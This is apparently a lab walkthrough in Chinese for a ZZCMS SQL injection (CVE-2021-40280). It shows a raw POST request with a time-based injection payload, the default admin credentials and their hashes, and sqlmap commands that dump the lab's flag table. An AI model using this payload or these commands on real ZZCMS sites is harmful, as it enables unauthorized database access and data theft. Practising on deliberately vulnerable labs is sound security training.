春秋云镜 CVE-2021-40280 zzcms注入
靶标介绍
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发;该漏洞源于 admin/dl_sendmail.php 中的 id 参数中存在 SQL 注入漏洞,同 CVE-2021-40282一样。
启动场景
漏洞利用
EXP
https://gist.github.com/aaaahuia/1fd31c1ebcddfe4c95268fa4f31fc312
POST /admin/dl_sendmail.php HTTP/1.1
Host: your host
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://zzcms.com
Connection: close
Referer: http://zzcms.com/admin/dl_sendmail.php
Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
Upgrade-Insecure-Requests: 1
id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(5)))a)
默认管理员账号admin/admin,密码MD5加密21232f297a57a5a743894a0e4a801fc3
普通会员账号2222/2222,密码MD5加密934B535800B1CBA8F96A5D72F72F1611
sqlmap验证
python3 sqlmap.py -u "http://eci-2zehgoxuevp3hfdkb5wj.cloudeci1.ichunqiu.com/admin/dl_sendmail.php" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1689918218,1690175805,1690423688; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1690423688; PHPSESSID=s1qe5cr18iutgt3rpolmqrkcf2;admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=2222; PassWord=934B535800B1CBA8F96A5D72F72F1611" --method POST --data "id[0]=0&id[1]=1" -p id[1] --tamper="between.py" --flush-session --dbs --batch
获取flag字段
python3 sqlmap.py -u "http://eci-2zehgoxuevp3hfdkb5wj.cloudeci1.ichunqiu.com/admin/dl_sendmail.php" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1689918218,1690175805,1690423688; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1690423688; PHPSESSID=s1qe5cr18iutgt3rpolmqrkcf2;admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=2222; PassWord=934B535800B1CBA8F96A5D72F72F1611" --method POST --data "id[0]=0&id[1]=1" -p id[1] --tamper="between.py" --flush-session -D "zzcms" -T "flag" --dump
得到flag
flag{e6822660-efc0-4c1c-94cb-354411d778a0}